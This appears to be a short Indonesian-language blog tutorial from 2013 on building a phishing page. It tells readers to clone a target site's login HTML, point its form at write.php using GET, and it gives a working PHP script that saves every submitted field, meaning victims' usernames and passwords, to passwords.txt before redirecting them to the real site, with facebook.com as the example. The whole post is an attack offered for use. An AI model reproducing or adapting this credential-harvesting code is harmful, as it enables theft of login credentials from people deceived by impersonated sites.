2013/07/21

TUTORIAL PHISING WEBSITE APA AJA

Nih Langsung aja gue ngantuk kagak panjang lebar nih tutor dri saya

1. pilih site target yg mau dijadiin halaman phising
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.htm
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini


Code:
<form action="RANDOM URL" method="post">

4. ganti url "RANDOM URL" jadi write.php trus ganti "post" jadi get
5. save
6. bikin "write.php"

Code:

<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


7. ganti tulisan yg http://RANDOM diatas jadi alamat yg diphising misal http://facebook.com/
8. save
9. upload deh dalam direktori yg sama ... ;))

sekian dari ane ...